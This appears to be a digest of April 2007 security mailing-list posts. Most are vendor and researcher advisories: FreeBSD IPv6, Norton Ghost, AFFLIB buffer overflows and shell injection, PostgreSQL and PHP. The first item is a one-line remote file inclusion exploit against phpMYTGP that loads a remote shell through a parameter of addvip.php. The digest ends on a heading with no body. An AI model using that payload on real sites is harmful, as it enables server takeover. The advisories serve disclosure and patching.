phpMYTGP v v1.4b RFI
+++ name version :phpMYTGP v1.4b vendor: www.allthescripts.com/page-207.htm by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,farzad exploit : http://victim/addvip.php?msetstr[PROGSDIR]=http://shell ++
FreeBSD Security Advisory FreeBSD-SA-07:03.ipv6
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 = FreeBSD-SA-07:03.ipv6 Security Advisory The FreeBSD Project Topic: IPv6 Routing Header 0 is dangerous Category: core Module: ipv6 Announced: 2007-04-26 Credits:Philippe Biondi, Arnaud Ebalard, Jun-ichiro itojun Hagino Affects:All FreeBSD releases. Corrected: 2007-04-24 11:42:42 UTC (RELENG_6, 6.2-STABLE) 2007-04-26 23:42:23 UTC (RELENG_6_2, 6.2-RELEASE-p4) 2007-04-26 23:41:59 UTC (RELENG_6_1, 6.1-RELEASE-p16) 2007-04-24 11:44:23 UTC (RELENG_5, 5.5-STABLE) 2007-04-26 23:41:27 UTC (RELENG_5_5, 5.5-RELEASE-p12) CVE Name: CVE-2007-2242 I. Background IPv6 provides a routing header option which allows a packet sender to indicate how the packet should be routed, overriding the routing knowledge present in a network. This functionality is roughly equivalent to the source routing option in IPv4. All nodes in an IPv6 network -- both routers and hosts -- are required by RFC 2640 to process such headers. II. Problem Description There is no mechanism for preventing IPv6 routing headers from being used to route packets over the same link(s) many times. III. Impact An attacker can amplify a denial of service attack against a link between two vulnerable hosts; that is, by sending a small volume of traffic the attacker can consume a much larger amount of bandwidth between the two vulnerable hosts. An attacker can use vulnerable hosts to concentrate a denial of service attack against a victim host or network; that is, a set of packets sent over a period of 30 seconds or more could be constructed such that they all arrive at the victim within a period of 1 second or less. Other attacks may also be possible. IV. Workaround No workaround is available. V. Solution NOTE WELL: The solution described below causes IPv6 type 0 routing headers to be ignored. Support for IPv6 type 0 routing headers can be re-enabled if required by setting the newly added net.inet6.ip6.rthdr0_allowed sysctl to a non-zero value. Perform one of the following: 1) Upgrade your vulnerable system to 5-STABLE, or 6-STABLE, or to the RELENG_6_2, RELENG_6_1, or RELENG_5_5 security branch dated after the correction date. 2) To patch your present system: The following patches have been verified to apply to FreeBSD 5.5, 6.1, and 6.2 systems. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch http://security.FreeBSD.org/patches/SA-07:03/ipv6.patch # fetch http://security.FreeBSD.org/patches/SA-07:03/ipv6.patch.asc b) Apply the patch. # cd /usr/src # patch /path/to/patch c) Recompile your kernel as described in URL:http://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system. VI. Correction details The following list contains the revision numbers of each file that was corrected in FreeBSD. Branch Revision Path - - RELENG_5 src/sys/netinet6/in6.h 1.35.2.5 src/sys/netinet6/in6_proto.c 1.29.2.5 src/sys/netinet6/route6.c 1.10.4.2 RELENG_5_5 src/UPDATING1.342.2.35.2.12 src/sys/conf/newvers.sh 1.62.2.21.2.14 src/sys/netinet6/in6.h 1.35.2.3.2.1 src/sys/netinet6/in6_proto.c 1.29.2.4.2.1 src/sys/netinet6/route6.c 1.10.4.1.4.1 RELENG_6 src/sys/netinet6/in6.h 1.36.2.8 src/sys/netinet6/in6_proto.c 1.32.2.6 src/sys/netinet6/route6.c 1.11.2.2 RELENG_6_2 src/UPDATING 1.416.2.29.2.7 src/sys/conf/newvers.sh 1.69.2.13.2.7 src/sys/netinet6/in6.h 1.36.2.7.2.1 src/sys/netinet6/in6_proto.c 1.32.2.5.2.1 src/sys/netinet6/route6.c 1.11.2.1.4.1 RELENG_6_1 src/UPDATING1.416.2.22.2.18 src/sys/conf/newvers.sh 1.69.2.11.2.18 src/sys/netinet6/in6.h 1.36.2.6.2.1 src/sys/netinet6/in6_proto.c 1.32.2.4.2.1 src/sys/netinet6/route6.c 1.11.2.1.2.1 - - VII. References
iDefense Security Advisory 04.26.07: Symantec Norton Ghost 10 Service Manager Buffer Overflow Vulnerability
Symantec Norton Ghost 10 Service Manager Buffer Overflow Vulnerability iDefense Security Advisory 04.26.07 http://labs.idefense.com/intelligence/vulnerabilities/ Apr 26, 2007 I. BACKGROUND Symantec Norton Ghost is a backup and recovery application designed to allow users to completely restore their systems to previous snapshots. More information can be found from the vendors site at the following URL. http://www.symantec.com/home_homeoffice/products/overview.jsp?pcid=brpvid=ghost10 II. DESCRIPTION Local exploitation of a buffer overflow vulnerability in Norton Ghost could allow local attackers to run code as the SYSTEM level user. Norton Ghost Service Manager is a Local Server COM object that allows privileged Ghost Backup Operators the ability to take and restore Ghost images of the system. A function within the Service Manager can be used to trigger a buffer overflow by supplying an overly long string. III. ANALYSIS Exploitation allows local attackers to execute code as the SYSTEM level user. In order to be able to exploit this vulnerability, attackers must have tasking privileges for the Norton Ghost Service Manager. IV. DETECTION iDefense verified the existence of this vulnerability on Norton Ghost 10.0. Other versions may be vulnerable as well. V. WORKAROUND iDefense recommends limiting which users have permission to interact with the Ghost Service Manager. Ghost provides a means to grant specific users access to these features. VI. VENDOR RESPONSE Symantec has addressed this vulnerability with a software update. The update is available via their LiveUpdate channels. For more information, consult their advisory at the following URL. http://www.symantec.com/avcenter/security/Content/2007.04.26.html VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 01/02/2007 Initial vendor notification 01/09/2007 Initial vendor response 04/26/2007 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Pravus. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 04.26.07: Symantec Norton Ghost 10 Recovery Points Insecure Password Storage Vulnerability
Symantec Norton Ghost 10 Recovery Points Insecure Password Storage Vulnerability iDefense Security Advisory 04.26.07 http://labs.idefense.com/intelligence/vulnerabilities/ Apr 26, 2007 I. BACKGROUND Symantec Norton Ghost is a backup and recovery application designed to allow users to completely restore their systems to previous snapshots. More information can be found from the vendors site at the following URL. http://www.symantec.com/home_homeoffice/products/overview.jsp?pcid=brpvid=ghost10 II. DESCRIPTION Norton Ghost allows administrators and other power users to schedule snapshots of local disks for backup and recovery purposes. If these recovery points are set to save to a remote network share Ghost will prompt the user to enter a user name and password for the share. Password information entered into Ghost for this purpose is encrypted and saved to the local file system in the applications home directory which has read access allowed for all users. The encryption key used by Ghost to decrypt these stored credentials is derived from the MD5 hash of the plain text user name stored in the configuration file. Since every user on the system has read access to these configuration files, any user can decrypt the stored passwords. III. ANALYSIS This vulnerability is the result of insecure encryption utilization plus insecure file permissions. In order for this exploit to have an impact, administrators would either have to configure client machines to save restore points images to a private share, or the vulnerable machine would have to be shared by several users who each saved their restore points images to private shares. IV. DETECTION iDefense verified the existence of this vulnerability on Norton Ghost 10.0. Other versions may be vulnerable as well. V. WORKAROUND If your current backup policy is vulnerable to this exploit scenario one possible work around is to configure client machines to save images to user network shares so that the configuration files only contain the individual users network credentials. VI. VENDOR RESPONSE Symantec has addressed this vulnerability with a software update. The update is available via their LiveUpdate channels. For more information, consult their advisory at the following URL. http://www.symantec.com/avcenter/security/Content/2007.04.26.html VII. CVE INFORMATION A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet. VIII. DISCLOSURE TIMELINE 01/02/2007 Initial vendor notification 03/21/2007 Second vendor notification 03/22/2007 Initial vendor response 04/26/2007 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Pravus. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright © 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
Security Concerns in Web 2.0
Hi, I did get a chance to submit a paper on security concerns in Web 2.0 This paper has been published by OWASP now and is available at link below: PDF version: http://www.owasp.org/index.php/Category:OWASP_Papers HTML version: http://www.owasp.org/index.php/OWASP_Papers/Jeopardy_in_Web_2_0 Happy reading !!! Please feel free to drop in your comments about the paper. You can mail me at dharmeshmm_at_gmail_com Wregs, Dharmesh M Mehta http://smartsecurity.blogspot.com
AFFLIB(TM): Multiple Buffer Overflows
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Multiple Buffer Overflows Discovered in AFFLIB Release Date: 2007-04-27 Application: AFFLIB(TM) Versions: 2.2.0 and likely earlier Severity: High Author: Timothy D. Morgan tmorgan {at} vsecurity {dot} com Vendor Status: Vendor Notified, Fix Available CVE Candidate: CVE-2007-2053 Reference: http://www.vsecurity.com/bulletins/advisories/2007/afflib-overflows.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description: From the forensicswiki.org website[1]: The Advanced Forensics Format (AFF) is an extensible open format for the storage of disk images and related forensic metadata. It was developed by Simson Garfinkel and Basis Technology. AFFLIB(TM) is the reference implementation of the AFF(TM) format, written primarily by Simson Garfinkel. It comes in the form of an open source library and a set of command line tools used to manipulate AFF(TM) files. Vulnerability Overview: In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a security code review of AFFLIB(TM) as a part of an internal tool assessment process. As a result, multiple vulnerabilities of varying severities were discovered. The most significant of these vulnerabilities are being announced publicly to raise awareness and help end-users secure themselves against potential attack. Multiple buffer overflows were found in AFFLIB(TM) which could allow an attacker to create a denial-of-service condition against a forensics examiner, or possibly to execute arbitrary code on the behalf of a victim. One such overflow may be triggered remotely and may be relatively easy to exploit. The other overflows identified appear to have medium to low severity, due to the low likelihood of an attacker having the ability to influence the vulnerable operations, at least in the typical use case scenarios. However, because AFFLIB(TM) is in part a library, other applications may utilize it in unanticipated ways, which may expose these attack vectors. All identified overflows were fixed in version 2.2.6. All line numbers listed below are from version 2.2.0. Vulnerability Details: The following sections include detailed descriptions of the most severe overflows found during the assessment. * Remote Stack-based Buffer Overflow Through Use of LastModified * File: lib/s3.cpp Line: 113 The LastModified string is copied to a fixed-length buffer using strcpy(3), but no length checking is apparently done when it is originally read from an XML response. This could allow a malicious Amazon S3 server or a man-in-the-middle to execute code on the S3 client system. (See [2] for more details on the Amazon S3 protocol.) Lines 111-115 illustrate the problem: /* Make date nice */ char tstamp[64]; strcpy(tstamp,(*i)-LastModified.c_str()); tstamp[10] = ' '; tstamp[19] = '\000'; Note that the (*i)-LastModified string is drawn directly from an XML response in the endElement() callback function (lines 173-178 of lib/s3_glue.cpp): case 3: if(!strcmp(name,Key)){einfo-lbr-contents.back()-Key = einfo-cbuf; break;} if(!strcmp(name,LastModified)){einfo-lbr-contents.back()-LastModified = einfo-cbuf;break;} if(!strcmp(name,ETag)){ einfo-lbr-contents.back()-ETag = einfo-cbuf;break;} if(!strcmp(name,Size)){ einfo-lbr-contents.back()-Size = atoi(einfo-cbuf.c_str());break;} break; An exploit of this would require that users decide to run the s3 binary program against an untrustworthy S3 server, or an attacker were able to conduct impersonation or man-in-the-middle attacks against the communications between the user and a valid S3 server. Since the s3 binary uses non-SSL HTTP connections by default, this may not be difficult. * Stack-based Buffer Overflows in S3 URL Parsing * File: lib/vnode_s3.cpp Lines: 80 81 Description: A portion of a potentially untrustworthy parameter is copied into a buffer without sufficient length checking in a memcpy() call, which writes to a stack-based buffer. If this function receives URLs from an untrusted source, code execution would be a major risk. Lines 66-81 are included below for illustration: /* Separate out the bucket and the path */ const char *fn = af_filename(af); regex_t re; if(regcomp(re,^s3://([^/]*)/(.*)$,REG_EXTENDED)){ err(1,regcomp); } regmatch_t match[3]; memset(match,0,sizeof(match)); if(regexec(re,fn,3,match,0)!=0){ return -1; // can't parse URL; must not be a match } char bucket[1024]; memset(bucket,0,sizeof(bucket)); char path[1024]; memset(path,0,sizeof(path)); memcpy(bucket,fn+match[1].rm_so,match[1].rm_eo-match[1].rm_so);
[USN-454-1] PostgreSQL vulnerability
=== Ubuntu Security Notice USN-454-1 April 26, 2007 postgresql-8.1, postgresql-8.2 vulnerability CVE-2007-2138 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: postgresql-8.1 8.1.9-0ubuntu0.6.06 Ubuntu 6.10: postgresql-8.1 8.1.9-0ubuntu0.6.10 Ubuntu 7.04: postgresql-8.2 8.2.4-0ubuntu0.7.04 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: PostgreSQL did not handle the search_path configuration option in a secure way for functions declared as SECURITY DEFINER. Previously, an attacker could override functions and operators used by the security definer function to execute arbitrary SQL commands with the privileges of the user who created the security definer function. The updated version does not search the temporary table schema for functions and operators any more. Similarly, an attacker could put forged tables into the temporary table schema to trick the security definer function into using attacker defined data for processing. This was possible because the temporary schema was always implicitly searched first before all other entries in search_path. The updated version now supports explicit placement of the temporary schema. Please see the HTML documentation or the manual page for CREATE FUNCTION for details and an example how to write security definer functions in a secure way. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.9-0ubuntu0.6.06.diff.gz Size/MD5:25680 c8dcb92c9d3e5059a235463f1e73d918 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.9-0ubuntu0.6.06.dsc Size/MD5: 1121 8be59c06b28d9c68161df198c3f70964 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.9.orig.tar.gz Size/MD5: 11422807 a77d87607ee8f264c7bc9581e9048bb2 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-doc-8.1_8.1.9-0ubuntu0.6.06_all.deb Size/MD5: 1459666 bf5c81ac3954cbca6c1a966845e1eade amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-compat2_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 158258 99703d2326077bd91a07c735fca4393f http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg-dev_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 349862 aea8e61788ee4c824744be6927d57a66 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libecpg5_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 178980 f86abe6f9fb9c48f23d24e99d0398d74 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpgtypes2_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 180374 3ff8b243c42ee96205075df99db336b6 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq-dev_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 313812 76e05d5b34bed281fea1fff2bfb4f57f http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/libpq4_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 211962 aff8b24ae2b177df4654d2cfd5d44e38 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-8.1_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 3234342 919d04b62e5994496530dcfdc72ae7af http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-client-8.1_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 788204 903d63291b5ca11bd357ae671e14f79c http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-contrib-8.1_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 619778 c5a061683a75292653ac9904b86f5a01 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plperl-8.1_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 174950 d9538ab098e6ac21ae42a7951e20d541 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-plpython-8.1_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 169110 3374672bfb17259e75db1b240f521de4 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-pltcl-8.1_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 169198 5f573e64710d5e6514ee99e84391bd18 http://security.ubuntu.com/ubuntu/pool/main/p/postgresql-8.1/postgresql-server-dev-8.1_8.1.9-0ubuntu0.6.06_amd64.deb Size/MD5: 602154 89ac9e12d5e2ef0e85a4a64f725fe41f i386 architecture (x86 compatible Intel/AMD)
AFFLIB(TM): Multiple Shell Metacharacter Injections
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Virtual Security Research, LLC. http://www.vsecurity.com/ Security Advisory - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: Multiple Shell Metacharacter Injections in AFFLIB Release Date: 2007-04-27 Application: AFFLIB(TM) Versions: 2.2.0-2.2.8 and likely earlier versions Severity: Medium to Low Author: Timothy D. Morgan tmorgan {at} vsecurity {dot} com Vendor Status: Vendor Notified CVE Candidate: CVE-2007-2055 Reference: http://www.vsecurity.com/bulletins/advisories/2007/afflib-shellinject.txt - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Product Description: From the forensicswiki.org website[1]: The Advanced Forensics Format (AFF) is an extensible open format for the storage of disk images and related forensic metadata. It was developed by Simson Garfinkel and Basis Technology. AFFLIB(TM) is the reference implementation of the AFF(TM) format, written primarily by Simson Garfinkel. It comes in the form of an open source library and a set of command line tools used to manipulate AFF(TM) files. Vulnerability Overview: In mid-March, 2007 Virtual Security Research, LLC (VSR) performed a security code review of AFFLIB(TM) as a part of an internal tool assessment process. As a result, multiple vulnerabilities of varying severities were discovered. The most significant of these vulnerabilities are being announced publicly to raise awareness and help end-users secure themselves against potential attack. VSR found that user-supplied command line parameters were used in several popen() calls without validation or escaping. The attack vectors available are limited, which reduces the overall severity of these problems. These vulnerabilities remain exploitable in the latest release (2.2.8), even though an attempt was made to check for a set of shell metacharacters. All line numbers listed below are from version 2.2.0. Vulnerability Details: The following sections include detailed descriptions of the specific instances of shell metacharacter injection found during the assessment. * Shell Command Injections in Decompression Calls * File: tools/afconvert.cpp Lines: 245 255 Platforms Affected: Unix Description: A command line parameter is used without validation or escaping in a popen() call. If this command (or this function) receives parameters from an untrusted source, code execution would be a major risk. Lines 240-257 are included below for illustration: /* Check to see if it is a gzip file... */ if(probe_gzip(infile) yesno(infile looks like a gzip file,Uncompress it,Uncompressing)){ /* Open with a subprocess. We will need to use zlib when we move to Windows. */ char buf[256]; sprintf(buf,gzcat %s,infile); a_in = af_popen(buf,r); } /* Check to see if it is a bzip2 file... */ if(!a_in probe_bzip2(infile) yesno(infile looks like a bzip2 file,Uncompress it,Uncompressing)){ /* Open with a subprocess. We will need to use bzip2zlib when we move to Windows. */ char buf[256]; sprintf(buf,bzcat %s,infile); a_in = af_popen(buf,r); } char buf[256]; sprintf(buf,gzcat %s,infile); a_in = af_popen(buf,r); Since af_popen() ultimately uses the popen() system call, and infile comes directly from a command line parameter, command line special characters could be injected if an attacker could control the input. * Shell Command Injection in Unused get_parameter Function * File: aimage/ident.cpp Line: 190 Platforms Affected: Unix Description: A function parameter is used without validation or escaping in a popen() call. If this function (get_parameter) received arguments from an untrusted source, code execution would be a major risk. This function does not appear to be called at this time. Vendor Response: Simson Garfinkel was first contacted on 2007-03-31. The following timeline outlines the responses from the vendor regarding this issue: 2007-04-01 - Vendor provided details of all vulnerabilities identified. 2007-04-03 - Continued vendor communication. 2007-04-05 - Vendor released version 2.2.6, containing multiple security fixes. 2007-04-06 - Vendor notified VSR that fixes were released. 2007-04-09 - VSR notified vendor that 9 vulnerability instances still remained in latest release. 2007-04-12 - Vendor confirmed that remaining vulnerabilities would be fixed in next release. 2007-04-25 - Vendor released versions 2.2.7 and 2.2.8. Vendor did not notify VSR. 2007-04-27 - VSR discovered new versions were released. VSR inspected version 2.2.8 and found that no additional vulnerabilities were fixed. VSR advisories published.
TSLSA-2007-0015 - postgresql
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Trustix Secure Linux Security Advisory #2007-0015 Package names: postgresql Summary: Multiple vulnerabilities Date: 2007-04-27 Affected versions: Trustix Secure Linux 2.2 Trustix Secure Linux 3.0 Trustix Secure Linux 3.0.5 Trustix Operating System - Enterprise Server 2 - -- Package description: postgresql PostgreSQL is an advanced Object-Relational database management system (DBMS) that supports almost all SQL constructs (including transactions, subselects and user-defined types and functions). The postgresql package includes the client programs and libraries that you'll need to access a PostgreSQL DBMS server. These PostgreSQL client programs are programs that directly manipulate the internal structure of PostgreSQL databases on a PostgreSQL server. These client programs can be located on the same machine with the PostgreSQL server, or may be on a remote machine which accesses a PostgreSQL server over a network connection. This package contains the docs in HTML for the whole package, as well as command-line utilities for managing PostgreSQL databases on a PostgreSQL server. Problem description: postgresql TSL 3.0.5TSL 3.0 TSL 2.2 TSEL 2 - New upstream. - SECURITY Fix: A vulnerability has been identified, which could be exploited by malicious users to obtain elevated privileges. This issue is caused by an insecure search_path settings, which could be exploited by unprivileged users to gain the SQL privileges of the owner of any SECURITY DEFINER function they are allowed to call The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2007-2138 to this issue. Action: We recommend that all systems with this package installed be upgraded. Please note that if you do not need the functionality provided by this package, you may want to remove it from your system. Location: All Trustix Secure Linux updates are available from URI:http://http.trustix.org/pub/trustix/updates/ URI:ftp://ftp.trustix.org/pub/trustix/updates/ About Trustix Secure Linux: Trustix Secure Linux is a small Linux distribution for servers. With focus on security and stability, the system is painlessly kept safe and up to date from day one using swup, the automated software updater. Automatic updates: Users of the SWUP tool can enjoy having updates automatically installed using 'swup --upgrade'. Questions? Check out our mailing lists: URI:http://www.trustix.org/support/ Verification: This advisory along with all Trustix packages are signed with the TSL sign key. This key is available from: URI:http://www.trustix.org/TSL-SIGN-KEY The advisory itself is available from the errata pages at URI:http://www.trustix.org/errata/trustix-2.2/ URI:http://www.trustix.org/errata/trustix-3.0/ and URI:http://www.trustix.org/errata/trustix-3.0.5/ or directly at URI:http://www.trustix.org/errata/2007/0015/ MD5sums of the packages: - -- c11e33ceceb5727389ccbe3758346685 3.0.5/rpms/postgresql-8.2.4-1tr.i586.rpm 2ebd428a46e0b22404b4c7cba6ab1d2b 3.0.5/rpms/postgresql-contrib-8.2.4-1tr.i586.rpm 7846323bf5b7c5cad66fc1e2943eb823 3.0.5/rpms/postgresql-devel-8.2.4-1tr.i586.rpm 082c2480a2470e4bfdfdd49728bdec66 3.0.5/rpms/postgresql-docs-8.2.4-1tr.i586.rpm 0194afe42b2a78c5e80a3cc1a7a01348 3.0.5/rpms/postgresql-libs-8.2.4-1tr.i586.rpm 9952b9136c90dd9225e25afc42b7ce00 3.0.5/rpms/postgresql-plperl-8.2.4-1tr.i586.rpm 8485cbd69d7979075693681677f9cafc 3.0.5/rpms/postgresql-python-8.2.4-1tr.i586.rpm c033ccc811e83e6a7eea5e9e07ac811f 3.0.5/rpms/postgresql-server-8.2.4-1tr.i586.rpm e09095ff553c892baecb2504f1a5a64e 3.0.5/rpms/postgresql-test-8.2.4-1tr.i586.rpm db1e46847bdb559560327a709c60c20e 3.0/rpms/postgresql-8.0.13-1tr.i586.rpm 65d589540e3163158d4fb548bc0eea0c 3.0/rpms/postgresql-contrib-8.0.13-1tr.i586.rpm 7ed871a7413ad0e551a5d6e31e8c7478 3.0/rpms/postgresql-devel-8.0.13-1tr.i586.rpm 6e8bebe4fc16084b12fa418b8800c14d 3.0/rpms/postgresql-docs-8.0.13-1tr.i586.rpm 25d92f457566db7d1189d9adce179cf2 3.0/rpms/postgresql-libs-8.0.13-1tr.i586.rpm ba78ef596f92925f86acc158f1c1a977 3.0/rpms/postgresql-plperl-8.0.13-1tr.i586.rpm d29ffb6e02ea23a0f1f317eeb8badf7b 3.0/rpms/postgresql-python-8.0.13-1tr.i586.rpm e9ee32fb0239171648dc592072737cbd 3.0/rpms/postgresql-server-8.0.13-1tr.i586.rpm 060d6169466cd85c598f80b4739b0ebc 3.0/rpms/postgresql-test-8.0.13-1tr.i586.rpm 32bd8555e6c7149d373b67da3900ab40 2.2/rpms/postgresql-8.0.13-1tr.i586.rpm 5d59b60f659ba949907da494e303973f 2.2/rpms/postgresql-contrib-8.0.13-1tr.i586.rpm bd1e7f2d66cc20272fd0d8e44cda41a1
[USN-455-1] PHP vulnerabilities
=== Ubuntu Security Notice USN-455-1 April 27, 2007 php5 vulnerabilities CVE-2007-1375, CVE-2007-1376, CVE-2007-1380, CVE-2007-1484, CVE-2007-1521, CVE-2007-1583, CVE-2007-1700, CVE-2007-1718, CVE-2007-1824, CVE-2007-1887, CVE-2007-1888, CVE-2007-1900 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: libapache2-mod-php5 5.1.2-1ubuntu3.7 php5-cgi 5.1.2-1ubuntu3.7 php5-cli 5.1.2-1ubuntu3.7 php5-sqlite 5.1.2-1ubuntu3.7 Ubuntu 6.10: libapache2-mod-php5 5.1.6-1ubuntu2.4 php5-cgi 5.1.6-1ubuntu2.4 php5-cli 5.1.6-1ubuntu2.4 php5-sqlite 5.1.6-1ubuntu2.4 Ubuntu 7.04: libapache2-mod-php5 5.2.1-0ubuntu1.1 php5-cgi 5.2.1-0ubuntu1.1 php5-cli 5.2.1-0ubuntu1.1 php5-sqlite 5.2.1-0ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Stefan Esser discovered multiple vulnerabilities in the Month of PHP bugs. The substr_compare() function did not sufficiently verify its length argument. This might be exploited to read otherwise unaccessible memory, which might lead to information disclosure. (CVE-2007-1375) The shared memory (shmop) functions did not verify resource types, thus they could be called with a wrong resource type that might contain user supplied data. This could be exploited to read and write arbitrary memory addresses of the PHP interpreter. This issue does not affect Ubuntu 7.04. (CVE-2007-1376) The php_binary handler of the session extension was missing a boundary check. When unserializing overly long variable names this could be exploited to read up to 126 bytes of memory, which might lead to information disclosure. (CVE-2007-1380) The internal array_user_key_compare() function, as used for example by the PHP function uksort(), incorrectly handled memory unreferencing of its arguments. This could have been exploited to execute arbitrary code with the privileges of the PHP interpreter, and thus circumventing any disable_functions, open_basedir, or safe_mode restrictions. (CVE-2007-1484) The session_regenerate_id() function did not properly clean up the former session identifier variable. This could be exploited to crash the PHP interpreter, possibly also remotely. (CVE-2007-1521) Under certain conditions the mb_parse_str() could cause the register_globals configuration option to become permanently enabled. This opened an attack vector for a large and common class of vulnerabilities. (CVE-2007-1583) The session extension did not set the correct reference count value for the session variables. By unsetting _SESSION and HTTP_SESSION_VARS (or tricking a PHP script into doing that) this could be exploited to execute arbitrary code with the privileges of the PHP interpreter. This issue does not affect Ubuntu 7.04. (CVE-2007-1700) The mail() function did not correctly escape control characters in multiline email headers. This could be remotely exploited to inject arbitrary email headers. (CVE-2007-1718) The php_stream_filter_create() function had an off-by-one buffer overflow in the handling of wildcards. This could be exploited to remotely crash the PHP interpreter. This issue does not affect Ubuntu 7.04. (CVE-2007-1824) When calling the sqlite_udf_decode_binary() with special arguments, a buffer overflow happened. Depending on the application this could be locally or remotely exploited to execute arbitrary code with the privileges of the PHP interpreter. (CVE-2007-1887 CVE-2007-1888) The FILTER_VALIDATE_EMAIL filter extension used a wrong regular expression that allowed injecting a newline character at the end of the email string. This could be exploited to inject arbitrary email headers. This issue only affects Ubuntu 7.04. (CVE-2007-1900) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.7.diff.gz Size/MD5: 117479 97145052f56b881e5bdcd933194a391d http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.7.dsc Size/MD5: 1766 427fffd561dd912abb032c73db855677 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2.orig.tar.gz Size/MD5: 8064193 b5b6564e8c6a0d5bc1d2b4787480d792 Architecture independent packages:
[ GLSA 200704-22 ] BEAST: Denial of Service
